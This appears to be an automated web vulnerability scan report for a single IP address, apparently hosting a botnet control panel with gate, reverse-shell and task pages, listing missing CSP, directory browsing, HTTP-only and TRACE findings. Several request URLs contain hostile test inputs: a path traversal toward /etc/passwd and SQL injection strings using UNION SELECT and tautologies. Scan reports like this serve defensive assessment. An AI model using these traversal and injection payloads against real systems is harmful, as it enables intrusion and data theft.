Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page — covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.
URL http://142.202.242.172
Method GET
Parameter
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
Method GET
Parameter
Attack
Evidence
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/gate.php?bot=DESKTOP-95IQEEV
Method GET
Parameter
Attack
Evidence
Request Header - size: 566 bytes.
Request Body - size: 0 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence
Request Header - size: 478 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 50
Solution
Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.
Reference https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy
https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html
https://www.w3.org/TR/CSP/
https://w3c.github.io/webappsec-csp/
https://web.dev/articles/csp
https://caniuse.com/#feat=contentsecuritypolicy
https://content-security-policy.com/
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 693
WASC Id 15
Plugin Id 10038
Medium
Directory Browsing
Description
It is possible to view a listing of the directory contents. Directory listings may reveal hidden scripts, include files, backup source files, etc., which can be accessed to reveal sensitive information.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack http://142.202.242.172/xampp/
Evidence Parent Directory
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence <title>Index of /xampp</title>
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
Instances 10
Solution
Configure the web server to disable directory browsing.
Reference https://cwe.mitre.org/data/definitions/548.html
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 548
WASC Id 16
Plugin Id 10033
Medium
HTTP Only Site
Description
The site is only served under HTTP and not HTTPS.
URL http://142.202.242.172/robots.txt
Method GET
Parameter
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter
Attack
Evidence
Request Header - size: 161 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence
Request Header - size: 699 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter
Attack
Evidence
Request Header - size: 195 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter
Attack
Evidence
Request Header - size: 156 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter
Attack
Evidence
Request Header - size: 250 bytes.
Request Body - size: 0 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence
Request Header - size: 943 bytes.
Request Body - size: 154 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence
Request Header - size: 850 bytes.
Request Body - size: 138 bytes.
Response Header - size: 14 bytes.
Response Body - size: 0 bytes.
Instances 8
Solution
Configure your web or application server to use SSL (https).
Reference https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Protection_Cheat_Sheet.html
https://letsencrypt.org/
Tags OWASP_2021_A05
WSTG-v42-SESS-02
OWASP_2017_A06
CWE Id 311
WASC Id 4
Plugin Id 10106
Medium
Insecure HTTP Method - TRACE
Description
The insecure HTTP method [TRACE] is enabled for this resource, and is exploitable. The TRACK and TRACE methods may be used by an attacker to gain access to the authorisation token/session cookie of an application user, even if the session cookie is protected using the HttpOnly flag. For the attack to be successful, the application user must typically be using an older web browser, or a web browser which has a Same Origin Policy (SOP) bypass vulnerability.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence 2R0Tvyu9hL9OkaP1ANptwqTDZvLLezZcVOtHikcK
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence C1dqiAR58i46kxxkCaT8D4EW6IukmEFk3CXN6jCc
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence FRmdke6T6iK96lZpSTKVrTnEPcnHmCdLKodGEcQW
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence gb2iK69Gqat7XheJo3lrfPVkAdwqXuZH3HX0ZLf2
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence q4xRFOoFC9OldDI54eujhXZAqKYPcvmp4usnXTBh
Request Header - size: 216 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172
Method TRACE
Parameter
Attack
Evidence R42Qj9ULBA1QxDjf0kAw4uBKBmHQJ11gipgyifkz
Request Header - size: 254 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 233 bytes.
URL http://142.202.242.172/
Method TRACE
Parameter
Attack
Evidence 2I2njUTA07fHPutp0cy5LYD7b3rLNVxkmAHFQKtj
Request Header - size: 255 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 233 bytes.
URL http://142.202.242.172/
Method TRACE
Parameter
Attack
Evidence 9les1XFsL6VR6eqgKs0dfyR16xkV0soFy3MbxWnd
Request Header - size: 217 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172/
Method TRACE
Parameter
Attack
Evidence dEyqrRMmnEa4KSXPVchQR7XLDMhPIASq0Eu4jmct
Request Header - size: 217 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172/
Method TRACE
Parameter
Attack
Evidence NnRFjbr47RVePMU3uuSflsEnSAxnwN385qzHGjn5
Request Header - size: 217 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 195 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence abViMg4o7KHJOQ36hCFXYI0BAEeib4vWcH8WVP8D
Request Header - size: 305 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 283 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence CBlynVvPXuJAfDo5mtth3ttuUr2VjgzqciilDYyE
Request Header - size: 305 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 283 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence Gu99GtFi6IzvRic8kMGz6L0U5qD1YSAU6KdFsgDE
Request Header - size: 305 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 283 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence T4zHMQvENTWubM3MvBkFsCHsPgzmriECR1zxPt82
Request Header - size: 305 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 283 bytes.
URL http://142.202.242.172/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence ZmJHiCAtzQaQrejgukN1XWH2RQrucOD4QdaUC9uG
Request Header - size: 267 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 245 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
Evidence i4MbrtE1PUj0ltaHh6okLSbuUwHgSpQSwAdC1WQK
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 205 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
Evidence Nj92eLAdIMOu1a1J1nhSU8MoWEv1GGKjJV3enFIL
Request Header - size: 265 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 243 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
Evidence vLCI3cvW49VelI3bNvMIOkfci4SJExoKIVtZTSp2
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 205 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
Evidence xWkw2N5KYFjRksznXQDjsHTNOr0XJnCRjw7Br7iF
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 205 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
Evidence zfOmljZ7hE3MCVtPxWKiQiAShby632L2FqF7SacB
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 205 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence 7wbvWpdKReOt1CwNhnbNMqNNe5Odm5jF4YQD6RAJ
Request Header - size: 228 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 206 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence ePKPD4fYx8vNIJzgW5AVY6GGFPJXW6o6dlNR8duM
Request Header - size: 228 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 206 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence NKZHj7JrDHQkbK62VNKSjdsYd22qE8B5OoKKOzrb
Request Header - size: 228 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 206 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence yHPdmiMmb4ZM2EyI0DUGhIs2EkL99xpR42mf9Dri
Request Header - size: 266 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 244 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence zY38n5jdV8jyhqnQj8pstpF9KYyOvUzcHBsKfRBN
Request Header - size: 228 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 206 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence f84PI1L5YaW1q5RmI33Au6e9s06cN4rolKrCprpe
Request Header - size: 220 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 198 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence jZ7raYfnoZsXYdbjGF4htSJv7hY8ysNyFxJlknM4
Request Header - size: 220 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 198 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence sSnqJWst8ZBrwqsK6WHbd6nRkMbV3mUtVs3MpYlX
Request Header - size: 419 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 397 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence TrsK52ivqavAD9zRC2XUrtS6DTMYXqxHfAgf5aFJ
Request Header - size: 754 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 732 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence XgBlQ07DGPLWIHvhAwJCDkweVKwXDt7Mll9rFacZ
Request Header - size: 716 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 694 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method TRACE
Parameter
Attack
Evidence Dwry1geRJTF3mh09e4XHs2LmioCCOxUun73gUuFX
Request Header - size: 287 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 265 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method TRACE
Parameter
Attack
Evidence 8oyDtuUEBbp9LtiJGWWuiLurQXqPIaSrQlWajivU
Request Header - size: 489 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 467 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence X2FQFq6CA5Ia4Xw8onKuA6gFBjBLt857Z50AlOTk
Request Header - size: 499 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 477 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method TRACE
Parameter
Attack
Evidence F8MRAivj25dUIPDG4pjc5Rdc10wXRglIQoZZYsw4
Request Header - size: 809 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 787 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence 5HfloJwuc2DaTWjCSW9nOHn3YPdE7ewAvUEbaIE9
Request Header - size: 433 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 411 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence 9zw2FMrH49QmlGcFdIL8gZP9MacdNoAnXpMmFdkb
Request Header - size: 433 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 411 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence DBo7I0ZXAFy3JoeonIzkf7EB3phQc1wVLOeSNrzm
Request Header - size: 259 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 237 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence nAcf53rC2yfqA5kAWGBySxLbF9qhoJqwZ4yAucFw
Request Header - size: 724 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 702 bytes.
